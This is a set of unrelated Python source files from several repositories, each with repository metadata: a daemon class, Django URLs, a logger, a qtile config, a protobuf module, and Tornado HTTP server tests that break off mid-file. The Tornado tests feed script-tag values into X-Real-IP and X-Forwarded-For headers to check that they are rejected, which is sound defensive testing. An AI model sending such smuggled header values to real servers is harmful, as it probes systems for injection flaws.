        # decouple from parent environment
        os.chdir("/")
        os.setsid()
        os.umask(0)

        # do second fork
        try:
            pid = os.fork()
            if pid > 0:
                # exit from second parent
                sys.exit(0)
        except OSError, e:
            sys.stderr.write("fork #2 failed: %d (%s)\n" % (e.errno, e.strerror))
            sys.exit(1)

        # redirect standard file descriptors
        sys.stdout.flush()
        sys.stderr.flush()
        si = file(self.stdin, 'r')
        so = file(self.stdout, 'a+')
        se = file(self.stderr, 'a+', 0)
        os.dup2(si.fileno(), sys.stdin.fileno())
        os.dup2(so.fileno(), sys.stdout.fileno())
        os.dup2(se.fileno(), sys.stderr.fileno())

        # write pidfile
        atexit.register(self.delpid)
        pid = str(os.getpid())
        file(self.pidfile,'w+').write("%s\n" % pid)

    def delpid(self):
        os.remove(self.pidfile)

    def start(self):
        """
        Start the daemon
        """
        # Check for a pidfile to see if the daemon already runs
        try:
            pf = file(self.pidfile,'r')
            pid = int(pf.read().strip())
            pf.close()
        except IOError:
            pid = None

        if pid:
            message = "pidfile %s already exist. Daemon already running?\n"
            sys.stderr.write(message % self.pidfile)
            sys.exit(1)

        # Start the daemon
        self.daemonize()
        self.run()

    def stop(self):
        """
        Stop the daemon
        """
        # Get the pid from the pidfile
        try:
            pf = file(self.pidfile,'r')
            pid = int(pf.read().strip())
            pf.close()
        except IOError:
            pid = None

        if not pid:
            message = "pidfile %s does not exist. Daemon not running?\n"
            sys.stderr.write(message % self.pidfile)
            return  # not an error in a restart

        # Try killing the daemon process
        try:
            while 1:
                os.kill(pid, SIGTERM)
                time.sleep(0.1)
        except OSError, err:
            err = str(err)
            if err.find("No such process") > 0:
                if os.path.exists(self.pidfile):
                    os.remove(self.pidfile)
            else:
                print str(err)
                sys.exit(1)

    def kill(self):
        """
        Force kill of daemon
        """
        # Get the pid from the pidfile
        try:
            pf = file(self.pidfile,'r')
            pid = int(pf.read().strip())
            pf.close()
        except IOError:
            pid = None

        if not pid:
            message = "pidfile %s does not exist. Daemon not running?\n"
            sys.stderr.write(message % self.pidfile)
            return  # not an error in a restart

        # Try killing the daemon process
        try:
            while 1:
                os.kill(pid, SIGKILL)
                time.sleep(0.1)
        except OSError, err:
            err = str(err)
            if err.find("No such process") > 0:
                if os.path.exists(self.pidfile):
                    os.remove(self.pidfile)
            else:
                print str(err)
                sys.exit(1)

    def restart(self):
        """
        Restart the daemon
        """
        self.stop()
        self.start()

    def run(self):
        """
        You should override this method when you subclass Daemon. It will be
        called after the process has been daemonized by start() or restart().
        """
marshallflax/NVDARemoteServer
daemon.py
Python
gpl-2.0
3,540
0.051695
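The docstring of the record above says to subclass Daemon and override run(); the sketch below shows that pattern. It is a minimal Python 2 example, not part of the original repository; the subclass name, pid file path and work loop are invented, and it assumes the class is importable from the module `daemon` (the file's path above).

import time
from daemon import Daemon

class EchoDaemon(Daemon):
    def run(self):
        # Runs in the daemonized process after the double fork.
        while True:
            time.sleep(10)  # real work would go here

if __name__ == '__main__':
    d = EchoDaemon('/tmp/echo-daemon.pid')
    d.start()   # or d.stop() / d.restart() / d.kill() for the other verbs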
"""pilvi URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/1.10/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.conf.urls import url, include 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls')) """ from django.conf.urls import url from django.contrib import admin urlpatterns = [ url(r'^admin/', admin.site.urls), ]
prawn-cake/pilvi
pilvi/urls.py
Python
mit
762
0
import os, shutil

if not os.path.isdir('Bin'):
    os.mkdir('Bin')

if not os.path.isdir('Temp'):
    os.mkdir('Temp')
cprogrammer1994/Python-ComputeShader
Prepare.py
Python
gpl-3.0
121
0.024793
# # Copyright (c) 2013 Juniper Networks, Inc. All rights reserved. # # # Sandesh Logger # import logging import logging.config import logging.handlers from gen_py.sandesh.ttypes import SandeshLevel import sandesh_base_logger import util def create_logger(generator, logger_class, logger_config_file=None): l_class = util.import_class(logger_class) return l_class(generator, logger_config_file=logger_config_file) class SandeshConfigLogger(sandesh_base_logger.SandeshBaseLogger): """Sandesh Config Logger Implementation. This class sets the log config file to the python logging module. The user should define the log config file as per format defined in [1]. [1] https://docs.python.org/2/library/logging.config.html """ def __init__(self, generator, logger_config_file=None): super(SandeshConfigLogger, self).__init__(generator) logging.config.fileConfig(logger_config_file) self._logger = logging.getLogger(generator) class SandeshLogger(sandesh_base_logger.SandeshBaseLogger): """Sandesh Logger Implementation.""" _DEFAULT_LOG_FILE = '<stdout>' _DEFAULT_SYSLOG_FACILITY = 'LOG_LOCAL0' def __init__(self, generator, logger_config_file=None): assert generator, 'SandeshLogger init requires generator name' super(SandeshLogger, self).__init__(generator) self._generator = generator self._logger = logging.getLogger(self._generator) self._logger.setLevel( sandesh_base_logger.SandeshBaseLogger.get_py_logger_level( SandeshLevel.SYS_INFO)) if not len(self._logger.handlers): # add the handler only once self._logging_file_handler = logging.StreamHandler() log_format = logging.Formatter( '%(asctime)s [%(name)s]: %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p') self._logging_file_handler.setFormatter(log_format) self._logger.addHandler(self._logging_file_handler) else: self._logging_file_handler = self._logger.handlers[0] # end __init__ def set_logging_params(self, enable_local_log=False, category='', level=SandeshLevel.SYS_INFO, file=_DEFAULT_LOG_FILE, enable_syslog=False, syslog_facility='LOG_LOCAL0', enable_trace_print=False, enable_flow_log=False): self.set_local_logging(enable_local_log) self.set_logging_category(category) self.set_logging_level(level) self.set_logging_file(file) self.set_logging_syslog(enable_syslog, syslog_facility) self.set_trace_print(enable_trace_print) self.set_flow_logging(enable_flow_log) # end set_logging_params def set_trace_print(self, enable_trace_print): if self.is_trace_print_enabled() != enable_trace_print: self._logger.info('SANDESH: Trace: PRINT: [%s] -> [%s]', self.is_trace_print_enabled(), enable_trace_print) super(SandeshLogger, self).set_trace_print(enable_trace_print) # end set_trace_print def set_flow_logging(self, enable_flow_log): if self.is_flow_logging_enabled() != enable_flow_log: self._logger.info('SANDESH: Flow Logging: [%s] -> [%s]', self.is_flow_logging_enabled(), enable_flow_log) super(SandeshLogger, self).set_flow_logging(enable_flow_log) # end set_flow_logging def set_logging_level(self, level): if isinstance(level, str): if level in SandeshLevel._NAMES_TO_VALUES: level = SandeshLevel._NAMES_TO_VALUES[level] else: level = SandeshLevel.SYS_INFO # get logging level corresponding to sandesh level try: logger_level = self._SANDESH_LEVEL_TO_LOGGER_LEVEL[level] except KeyError: logger_level = logging.INFO level = SandeshLevel.SYS_INFO self._logger.info('SANDESH: Logging: LEVEL: [%s] -> [%s]', SandeshLevel._VALUES_TO_NAMES[self.logging_level()], SandeshLevel._VALUES_TO_NAMES[level]) self._logger.setLevel(logger_level) super(SandeshLogger, self).set_logging_level(level) # 
end set_logging_level def set_logging_file(self, file): if self.logging_file() != file: self._logger.info('SANDESH: Logging: FILE: [%s] -> [%s]', self.logging_file(), file) self._logger.removeHandler(self._logging_file_handler) if file == self._DEFAULT_LOG_FILE: self._logging_file_handler = logging.StreamHandler() else: self._logging_file_handler = ( logging.handlers.RotatingFileHandler( filename=file, maxBytes=5000000, backupCount=10)) log_format = logging.Formatter( '%(asctime)s [%(name)s]: %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p') self._logging_file_handler.setFormatter(log_format) self._logger.addHandler(self._logging_file_handler) super(SandeshLogger, self).set_logging_file(file) # end set_logging_file def set_logging_syslog(self, enable_syslog, syslog_facility): if (self.is_syslog_logging_enabled() == enable_syslog and self.logging_syslog_facility() == syslog_facility): return if self.logging_syslog_facility() != syslog_facility: self._logger.info('SANDESH: Logging: SYSLOG: [%s] -> [%s]', self.logging_syslog_facility(), syslog_facility) if self.is_syslog_logging_enabled(): self._logger.removeHandler(self._logging_syslog_handler) if enable_syslog: self._logging_syslog_handler = logging.handlers.SysLogHandler( address="/dev/log", facility=getattr(logging.handlers.SysLogHandler, syslog_facility, logging.handlers.SysLogHandler.LOG_LOCAL0) ) self._logger.addHandler(self._logging_syslog_handler) super(SandeshLogger, self).set_logging_syslog(enable_syslog, syslog_facility) # end set_logging_syslog # end class SandeshLogger
toabctl/contrail-sandesh
library/python/pysandesh/sandesh_logger.py
Python
apache-2.0
6,516
0
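For context on the record above: create_logger() imports a logger class by dotted path and the resulting SandeshLogger is then tuned with set_logging_params(). The lines below are a small sketch under stated assumptions: the dotted path is guessed from the file's location, the generator name and log file path are examples, and SandeshLevel is assumed importable as in the record's own imports.

logger = create_logger(
    'my-generator',
    'pysandesh.sandesh_logger.SandeshLogger')   # assumed dotted path
logger.set_logging_params(
    enable_local_log=True,
    level=SandeshLevel.SYS_INFO,
    file='/var/log/contrail/my-generator.log',  # example path
    enable_syslog=False)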
# -*- coding: utf-8 -*- from libqtile.manager import Key, Click, Drag, Screen, Group from libqtile.command import lazy from libqtile import layout, bar, widget, hook from libqtile import xcbq xcbq.keysyms["XF86AudioRaiseVolume"] = 0x1008ff13 xcbq.keysyms["XF86AudioLowerVolume"] = 0x1008ff11 xcbq.keysyms["XF86AudioMute"] = 0x1008ff12 def window_sorter(win): patterns = ( ('Яндекс.Почта', 'E-mail'), ('Gmail', 'E-mail'), ('SquirrelMail', 'E-mail'), ('zeromq', 'Docs'), ('PyYAML', 'Docs'), ('documentation', 'Docs'), ('-ietf-', 'Docs'), ('GNOME Live!', 'Docs'), ('Guide', 'Docs'), ) for k, v in patterns: if k in win.name: return v mod = "mod4" keys = [ Key([mod], "j", lazy.layout.down()), Key([mod], "k", lazy.layout.up()), Key([mod, "shift"], "j", lazy.layout.move_down()), Key([mod, "shift"], "k", lazy.layout.move_up()), Key([mod, "control"], "j", lazy.layout.section_down()), Key([mod, "control"], "k", lazy.layout.section_up()), Key([mod], "h", lazy.layout.collapse_branch()), # for tree layout Key([mod], "l", lazy.layout.expand_branch()), # for tree layout Key([mod], "r", lazy.layout.sort_windows(window_sorter)), # for tree layout Key([mod, "shift"], "h", lazy.layout.move_left()), Key([mod, "shift"], "l", lazy.layout.move_right()), Key([mod, "control"], "l", lazy.layout.increase_ratio()), Key([mod, "control"], "h", lazy.layout.decrease_ratio()), Key([mod], "comma", lazy.layout.increase_nmaster()), Key([mod], "period", lazy.layout.decrease_nmaster()), Key([mod], "Tab", lazy.group.next_window()), Key([mod, "shift"], "Tab", lazy.group.prev_window()), Key([mod, "shift"], "Return", lazy.layout.rotate()), Key([mod, "shift"], "space", lazy.layout.toggle_split()), Key([mod], "w", lazy.to_screen(0)), Key([mod], "e", lazy.to_screen(1)), Key([mod], "space", lazy.nextlayout()), Key([mod], "c", lazy.window.kill()), Key([mod], "t", lazy.window.disable_floating()), Key([mod, "shift"], "t", lazy.window.enable_floating()), Key([mod], "p", lazy.spawn("exec dmenu_run " "-fn 'Consolas:size=13' -nb '#000000' -nf '#ffffff' -b")), Key([mod], "b", lazy.spawn("~/note/conf/uzbl/open_history")), Key([mod, "shift"], "b", lazy.spawn("~/note/conf/uzbl/open_bookmark")), Key([mod], "s", lazy.spawn("~/note/conf/uzbl/open_ddg")), Key([mod, "shift"], "s", lazy.spawn("~/note/conf/uzbl/open_goog")), Key([mod], "q", lazy.spawn('xtrlock')), Key([mod], "y", lazy.spawn('xclip -o -selection primary | xclip -selection clipboard')), Key([mod], "u", lazy.spawn('xclip -o -selection clipboard | xclip -selection primary')), Key([], "XF86AudioRaiseVolume", lazy.spawn("amixer sset Master 5%+")), Key([], "XF86AudioLowerVolume", lazy.spawn("amixer sset Master 5%-")), Key([], "XF86AudioMute", lazy.spawn("amixer sset Master toggle")), Key(["shift"], "XF86AudioRaiseVolume", lazy.spawn("mpc volume +5")), Key(["shift"], "XF86AudioLowerVolume", lazy.spawn("mpc volume -5")), Key(["shift"], "XF86AudioMute", lazy.spawn("mpc toggle")), Key([mod], "Left", lazy.prevgroup()), Key([mod], "Right", lazy.nextgroup()), ] mouse = [ Drag([mod], "Button1", lazy.window.set_position_floating(), start=lazy.window.get_position()), Drag([mod], "Button3", lazy.window.set_size_floating(), start=lazy.window.get_size()), Click([mod], "Button2", lazy.window.bring_to_front()) ] border = dict( border_normal='#808080', border_width=2, ) layouts = [ layout.Tile(**border), layout.Max(), layout.Stack(**border), layout.TreeTab(sections=['Surfing', 'E-mail', 'Docs', 'Incognito']), layout.Slice('left', 320, wmclass='pino', fallback=layout.Slice('right', 320, role='roster', 
fallback=layout.Stack(1, **border))), layout.Slice('left', 192, role='gimp-toolbox', fallback=layout.Slice('right', 256, role='gimp-dock', fallback=layout.Stack(1, **border))), ] floating_layout = layout.Floating(**border) groups = [ Group('1'), Group('2', layout='max'), Group('3'), Group('4', layout='treetab'), Group('5'), Group('6'), Group('7'), Group('8'), Group('9'), ] for i in groups: keys.append( Key([mod], i.name, lazy.group[i.name].toscreen()) ) keys.append( Key([mod, "shift"], i.name, lazy.window.togroup(i.name)) ) screens = [ Screen( top = bar.Bar( [ widget.GroupBox(borderwidth=2, font='Consolas',fontsize=18, padding=1, margin_x=1, margin_y=1), widget.Sep(), widget.WindowName( font='Consolas',fontsize=18, margin_x=6), widget.Sep(), widget.Battery( font='Consolas',fontsize=18, margin_x=6), widget.Sep(), widget.CPUGraph(), widget.MemoryGraph(), widget.SwapGraph(foreground='C02020'), widget.Sep(), widget.Systray(), widget.Sep(), widget.Clock('%H:%M:%S %d.%m.%Y', font='Consolas', fontsize=18, padding=6), ], 24, ), ), ] @hook.subscribe.client_new def dialogs(window): if(window.window.get_wm_type() == 'dialog' or window.window.get_wm_transient_for()): window.floating = True
andrelaszlo/qtile
examples/config/tailhook-config.py
Python
mit
6,113
0.003278
# Generated by the protocol buffer compiler.  DO NOT EDIT!
# source: POGOProtos/Networking/Requests/Messages/CollectDailyDefenderBonusMessage.proto

import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)

_sym_db = _symbol_database.Default()


DESCRIPTOR = _descriptor.FileDescriptor(
  name='POGOProtos/Networking/Requests/Messages/CollectDailyDefenderBonusMessage.proto',
  package='POGOProtos.Networking.Requests.Messages',
  syntax='proto3',
  serialized_pb=_b('\nNPOGOProtos/Networking/Requests/Messages/CollectDailyDefenderBonusMessage.proto\x12\'POGOProtos.Networking.Requests.Messages\"\"\n CollectDailyDefenderBonusMessageb\x06proto3')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)


_COLLECTDAILYDEFENDERBONUSMESSAGE = _descriptor.Descriptor(
  name='CollectDailyDefenderBonusMessage',
  full_name='POGOProtos.Networking.Requests.Messages.CollectDailyDefenderBonusMessage',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=123,
  serialized_end=157,
)

DESCRIPTOR.message_types_by_name['CollectDailyDefenderBonusMessage'] = _COLLECTDAILYDEFENDERBONUSMESSAGE

CollectDailyDefenderBonusMessage = _reflection.GeneratedProtocolMessageType('CollectDailyDefenderBonusMessage', (_message.Message,), dict(
  DESCRIPTOR = _COLLECTDAILYDEFENDERBONUSMESSAGE,
  __module__ = 'POGOProtos.Networking.Requests.Messages.CollectDailyDefenderBonusMessage_pb2'
  # @@protoc_insertion_point(class_scope:POGOProtos.Networking.Requests.Messages.CollectDailyDefenderBonusMessage)
  ))
_sym_db.RegisterMessage(CollectDailyDefenderBonusMessage)


# @@protoc_insertion_point(module_scope)
Mickey32111/pogom
pogom/pgoapi/protos/POGOProtos/Networking/Requests/Messages/CollectDailyDefenderBonusMessage_pb2.py
Python
mit
2,108
0.010436
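A quick round-trip sketch for the generated, field-less message above, using only the standard protobuf Message API (SerializeToString / FromString); the import path mirrors the __module__ string in the generated code and assumes the POGOProtos package is importable.

from POGOProtos.Networking.Requests.Messages.CollectDailyDefenderBonusMessage_pb2 import (
    CollectDailyDefenderBonusMessage,
)

msg = CollectDailyDefenderBonusMessage()       # the message defines no fields
wire = msg.SerializeToString()                 # empty payload: b''
roundtrip = CollectDailyDefenderBonusMessage.FromString(wire)
assert roundtrip == msg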
#!/usr/bin/env python from __future__ import absolute_import, division, print_function, with_statement from tornado import netutil from tornado.escape import json_decode, json_encode, utf8, _unicode, recursive_unicode, native_str from tornado import gen from tornado.http1connection import HTTP1Connection from tornado.httpserver import HTTPServer from tornado.httputil import HTTPHeaders, HTTPMessageDelegate, HTTPServerConnectionDelegate, ResponseStartLine from tornado.iostream import IOStream from tornado.log import gen_log from tornado.netutil import ssl_options_to_context from tornado.simple_httpclient import SimpleAsyncHTTPClient from tornado.testing import AsyncHTTPTestCase, AsyncHTTPSTestCase, AsyncTestCase, ExpectLog, gen_test from tornado.test.util import unittest, skipOnTravis from tornado.web import Application, RequestHandler, asynchronous, stream_request_body from contextlib import closing import datetime import gzip import os import shutil import socket import ssl import sys import tempfile from io import BytesIO def read_stream_body(stream, callback): """Reads an HTTP response from `stream` and runs callback with its headers and body.""" chunks = [] class Delegate(HTTPMessageDelegate): def headers_received(self, start_line, headers): self.headers = headers def data_received(self, chunk): chunks.append(chunk) def finish(self): callback((self.headers, b''.join(chunks))) conn = HTTP1Connection(stream, True) conn.read_response(Delegate()) class HandlerBaseTestCase(AsyncHTTPTestCase): def get_app(self): return Application([('/', self.__class__.Handler)]) def fetch_json(self, *args, **kwargs): response = self.fetch(*args, **kwargs) response.rethrow() return json_decode(response.body) class HelloWorldRequestHandler(RequestHandler): def initialize(self, protocol="http"): self.expected_protocol = protocol def get(self): if self.request.protocol != self.expected_protocol: raise Exception("unexpected protocol") self.finish("Hello world") def post(self): self.finish("Got %d bytes in POST" % len(self.request.body)) # In pre-1.0 versions of openssl, SSLv23 clients always send SSLv2 # ClientHello messages, which are rejected by SSLv3 and TLSv1 # servers. Note that while the OPENSSL_VERSION_INFO was formally # introduced in python3.2, it was present but undocumented in # python 2.7 skipIfOldSSL = unittest.skipIf( getattr(ssl, 'OPENSSL_VERSION_INFO', (0, 0)) < (1, 0), "old version of ssl module and/or openssl") class BaseSSLTest(AsyncHTTPSTestCase): def get_app(self): return Application([('/', HelloWorldRequestHandler, dict(protocol="https"))]) class SSLTestMixin(object): def get_ssl_options(self): return dict(ssl_version=self.get_ssl_version(), # type: ignore **AsyncHTTPSTestCase.get_ssl_options()) def get_ssl_version(self): raise NotImplementedError() def test_ssl(self): response = self.fetch('/') self.assertEqual(response.body, b"Hello world") def test_large_post(self): response = self.fetch('/', method='POST', body='A' * 5000) self.assertEqual(response.body, b"Got 5000 bytes in POST") def test_non_ssl_request(self): # Make sure the server closes the connection when it gets a non-ssl # connection, rather than waiting for a timeout or otherwise # misbehaving. 
with ExpectLog(gen_log, '(SSL Error|uncaught exception)'): with ExpectLog(gen_log, 'Uncaught exception', required=False): self.http_client.fetch( self.get_url("/").replace('https:', 'http:'), self.stop, request_timeout=3600, connect_timeout=3600) response = self.wait() self.assertEqual(response.code, 599) def test_error_logging(self): # No stack traces are logged for SSL errors. with ExpectLog(gen_log, 'SSL Error') as expect_log: self.http_client.fetch( self.get_url("/").replace("https:", "http:"), self.stop) response = self.wait() self.assertEqual(response.code, 599) self.assertFalse(expect_log.logged_stack) # Python's SSL implementation differs significantly between versions. # For example, SSLv3 and TLSv1 throw an exception if you try to read # from the socket before the handshake is complete, but the default # of SSLv23 allows it. class SSLv23Test(BaseSSLTest, SSLTestMixin): def get_ssl_version(self): return ssl.PROTOCOL_SSLv23 @skipIfOldSSL class SSLv3Test(BaseSSLTest, SSLTestMixin): def get_ssl_version(self): return ssl.PROTOCOL_SSLv3 @skipIfOldSSL class TLSv1Test(BaseSSLTest, SSLTestMixin): def get_ssl_version(self): return ssl.PROTOCOL_TLSv1 @unittest.skipIf(not hasattr(ssl, 'SSLContext'), 'ssl.SSLContext not present') class SSLContextTest(BaseSSLTest, SSLTestMixin): def get_ssl_options(self): context = ssl_options_to_context( AsyncHTTPSTestCase.get_ssl_options(self)) assert isinstance(context, ssl.SSLContext) return context class BadSSLOptionsTest(unittest.TestCase): def test_missing_arguments(self): application = Application() self.assertRaises(KeyError, HTTPServer, application, ssl_options={ "keyfile": "/__missing__.crt", }) def test_missing_key(self): """A missing SSL key should cause an immediate exception.""" application = Application() module_dir = os.path.dirname(__file__) existing_certificate = os.path.join(module_dir, 'test.crt') existing_key = os.path.join(module_dir, 'test.key') self.assertRaises((ValueError, IOError), HTTPServer, application, ssl_options={ "certfile": "/__mising__.crt", }) self.assertRaises((ValueError, IOError), HTTPServer, application, ssl_options={ "certfile": existing_certificate, "keyfile": "/__missing__.key" }) # This actually works because both files exist HTTPServer(application, ssl_options={ "certfile": existing_certificate, "keyfile": existing_key, }) class MultipartTestHandler(RequestHandler): def post(self): self.finish({"header": self.request.headers["X-Header-Encoding-Test"], "argument": self.get_argument("argument"), "filename": self.request.files["files"][0].filename, "filebody": _unicode(self.request.files["files"][0]["body"]), }) # This test is also called from wsgi_test class HTTPConnectionTest(AsyncHTTPTestCase): def get_handlers(self): return [("/multipart", MultipartTestHandler), ("/hello", HelloWorldRequestHandler)] def get_app(self): return Application(self.get_handlers()) def raw_fetch(self, headers, body, newline=b"\r\n"): with closing(IOStream(socket.socket())) as stream: stream.connect(('127.0.0.1', self.get_http_port()), self.stop) self.wait() stream.write( newline.join(headers + [utf8("Content-Length: %d" % len(body))]) + newline + newline + body) read_stream_body(stream, self.stop) headers, body = self.wait() return body def test_multipart_form(self): # Encodings here are tricky: Headers are latin1, bodies can be # anything (we use utf8 by default). 
response = self.raw_fetch([ b"POST /multipart HTTP/1.0", b"Content-Type: multipart/form-data; boundary=1234567890", b"X-Header-encoding-test: \xe9", ], b"\r\n".join([ b"Content-Disposition: form-data; name=argument", b"", u"\u00e1".encode("utf-8"), b"--1234567890", u'Content-Disposition: form-data; name="files"; filename="\u00f3"'.encode("utf8"), b"", u"\u00fa".encode("utf-8"), b"--1234567890--", b"", ])) data = json_decode(response) self.assertEqual(u"\u00e9", data["header"]) self.assertEqual(u"\u00e1", data["argument"]) self.assertEqual(u"\u00f3", data["filename"]) self.assertEqual(u"\u00fa", data["filebody"]) def test_newlines(self): # We support both CRLF and bare LF as line separators. for newline in (b"\r\n", b"\n"): response = self.raw_fetch([b"GET /hello HTTP/1.0"], b"", newline=newline) self.assertEqual(response, b'Hello world') def test_100_continue(self): # Run through a 100-continue interaction by hand: # When given Expect: 100-continue, we get a 100 response after the # headers, and then the real response after the body. stream = IOStream(socket.socket(), io_loop=self.io_loop) stream.connect(("127.0.0.1", self.get_http_port()), callback=self.stop) self.wait() stream.write(b"\r\n".join([b"POST /hello HTTP/1.1", b"Content-Length: 1024", b"Expect: 100-continue", b"Connection: close", b"\r\n"]), callback=self.stop) self.wait() stream.read_until(b"\r\n\r\n", self.stop) data = self.wait() self.assertTrue(data.startswith(b"HTTP/1.1 100 "), data) stream.write(b"a" * 1024) stream.read_until(b"\r\n", self.stop) first_line = self.wait() self.assertTrue(first_line.startswith(b"HTTP/1.1 200"), first_line) stream.read_until(b"\r\n\r\n", self.stop) header_data = self.wait() headers = HTTPHeaders.parse(native_str(header_data.decode('latin1'))) stream.read_bytes(int(headers["Content-Length"]), self.stop) body = self.wait() self.assertEqual(body, b"Got 1024 bytes in POST") stream.close() class EchoHandler(RequestHandler): def get(self): self.write(recursive_unicode(self.request.arguments)) def post(self): self.write(recursive_unicode(self.request.arguments)) class TypeCheckHandler(RequestHandler): def prepare(self): self.errors = {} fields = [ ('method', str), ('uri', str), ('version', str), ('remote_ip', str), ('protocol', str), ('host', str), ('path', str), ('query', str), ] for field, expected_type in fields: self.check_type(field, getattr(self.request, field), expected_type) self.check_type('header_key', list(self.request.headers.keys())[0], str) self.check_type('header_value', list(self.request.headers.values())[0], str) self.check_type('cookie_key', list(self.request.cookies.keys())[0], str) self.check_type('cookie_value', list(self.request.cookies.values())[0].value, str) # secure cookies self.check_type('arg_key', list(self.request.arguments.keys())[0], str) self.check_type('arg_value', list(self.request.arguments.values())[0][0], bytes) def post(self): self.check_type('body', self.request.body, bytes) self.write(self.errors) def get(self): self.write(self.errors) def check_type(self, name, obj, expected_type): actual_type = type(obj) if expected_type != actual_type: self.errors[name] = "expected %s, got %s" % (expected_type, actual_type) class HTTPServerTest(AsyncHTTPTestCase): def get_app(self): return Application([("/echo", EchoHandler), ("/typecheck", TypeCheckHandler), ("//doubleslash", EchoHandler), ]) def test_query_string_encoding(self): response = self.fetch("/echo?foo=%C3%A9") data = json_decode(response.body) self.assertEqual(data, {u"foo": [u"\u00e9"]}) def 
test_empty_query_string(self): response = self.fetch("/echo?foo=&foo=") data = json_decode(response.body) self.assertEqual(data, {u"foo": [u"", u""]}) def test_empty_post_parameters(self): response = self.fetch("/echo", method="POST", body="foo=&bar=") data = json_decode(response.body) self.assertEqual(data, {u"foo": [u""], u"bar": [u""]}) def test_types(self): headers = {"Cookie": "foo=bar"} response = self.fetch("/typecheck?foo=bar", headers=headers) data = json_decode(response.body) self.assertEqual(data, {}) response = self.fetch("/typecheck", method="POST", body="foo=bar", headers=headers) data = json_decode(response.body) self.assertEqual(data, {}) def test_double_slash(self): # urlparse.urlsplit (which tornado.httpserver used to use # incorrectly) would parse paths beginning with "//" as # protocol-relative urls. response = self.fetch("//doubleslash") self.assertEqual(200, response.code) self.assertEqual(json_decode(response.body), {}) def test_malformed_body(self): # parse_qs is pretty forgiving, but it will fail on python 3 # if the data is not utf8. On python 2 parse_qs will work, # but then the recursive_unicode call in EchoHandler will # fail. if str is bytes: return with ExpectLog(gen_log, 'Invalid x-www-form-urlencoded body'): response = self.fetch( '/echo', method="POST", headers={'Content-Type': 'application/x-www-form-urlencoded'}, body=b'\xe9') self.assertEqual(200, response.code) self.assertEqual(b'{}', response.body) class HTTPServerRawTest(AsyncHTTPTestCase): def get_app(self): return Application([ ('/echo', EchoHandler), ]) def setUp(self): super(HTTPServerRawTest, self).setUp() self.stream = IOStream(socket.socket()) self.stream.connect(('127.0.0.1', self.get_http_port()), self.stop) self.wait() def tearDown(self): self.stream.close() super(HTTPServerRawTest, self).tearDown() def test_empty_request(self): self.stream.close() self.io_loop.add_timeout(datetime.timedelta(seconds=0.001), self.stop) self.wait() def test_malformed_first_line(self): with ExpectLog(gen_log, '.*Malformed HTTP request line'): self.stream.write(b'asdf\r\n\r\n') # TODO: need an async version of ExpectLog so we don't need # hard-coded timeouts here. self.io_loop.add_timeout(datetime.timedelta(seconds=0.05), self.stop) self.wait() def test_malformed_headers(self): with ExpectLog(gen_log, '.*Malformed HTTP headers'): self.stream.write(b'GET / HTTP/1.0\r\nasdf\r\n\r\n') self.io_loop.add_timeout(datetime.timedelta(seconds=0.05), self.stop) self.wait() def test_chunked_request_body(self): # Chunked requests are not widely supported and we don't have a way # to generate them in AsyncHTTPClient, but HTTPServer will read them. self.stream.write(b"""\ POST /echo HTTP/1.1 Transfer-Encoding: chunked Content-Type: application/x-www-form-urlencoded 4 foo= 3 bar 0 """.replace(b"\n", b"\r\n")) read_stream_body(self.stream, self.stop) headers, response = self.wait() self.assertEqual(json_decode(response), {u'foo': [u'bar']}) def test_chunked_request_uppercase(self): # As per RFC 2616 section 3.6, "Transfer-Encoding" header's value is # case-insensitive. 
self.stream.write(b"""\ POST /echo HTTP/1.1 Transfer-Encoding: Chunked Content-Type: application/x-www-form-urlencoded 4 foo= 3 bar 0 """.replace(b"\n", b"\r\n")) read_stream_body(self.stream, self.stop) headers, response = self.wait() self.assertEqual(json_decode(response), {u'foo': [u'bar']}) def test_invalid_content_length(self): with ExpectLog(gen_log, '.*Only integer Content-Length is allowed'): self.stream.write(b"""\ POST /echo HTTP/1.1 Content-Length: foo bar """.replace(b"\n", b"\r\n")) self.stream.read_until_close(self.stop) self.wait() class XHeaderTest(HandlerBaseTestCase): class Handler(RequestHandler): def get(self): self.write(dict(remote_ip=self.request.remote_ip, remote_protocol=self.request.protocol)) def get_httpserver_options(self): return dict(xheaders=True) def test_ip_headers(self): self.assertEqual(self.fetch_json("/")["remote_ip"], "127.0.0.1") valid_ipv4 = {"X-Real-IP": "4.4.4.4"} self.assertEqual( self.fetch_json("/", headers=valid_ipv4)["remote_ip"], "4.4.4.4") valid_ipv4_list = {"X-Forwarded-For": "127.0.0.1, 4.4.4.4"} self.assertEqual( self.fetch_json("/", headers=valid_ipv4_list)["remote_ip"], "4.4.4.4") valid_ipv6 = {"X-Real-IP": "2620:0:1cfe:face:b00c::3"} self.assertEqual( self.fetch_json("/", headers=valid_ipv6)["remote_ip"], "2620:0:1cfe:face:b00c::3") valid_ipv6_list = {"X-Forwarded-For": "::1, 2620:0:1cfe:face:b00c::3"} self.assertEqual( self.fetch_json("/", headers=valid_ipv6_list)["remote_ip"], "2620:0:1cfe:face:b00c::3") invalid_chars = {"X-Real-IP": "4.4.4.4<script>"} self.assertEqual( self.fetch_json("/", headers=invalid_chars)["remote_ip"], "127.0.0.1") invalid_chars_list = {"X-Forwarded-For": "4.4.4.4, 5.5.5.5<script>"} self.assertEqual( self.fetch_json("/", headers=invalid_chars_list)["remote_ip"], "127.0.0.1") invalid_host = {"X-Real-IP": "www.google.com"} self.assertEqual( self.fetch_json("/", headers=invalid_host)["remote_ip"], "127.0.0.1") def test_scheme_headers(self): self.assertEqual(self.fetch_json("/")["remote_protocol"], "http") https_scheme = {"X-Scheme": "https"} self.assertEqual( 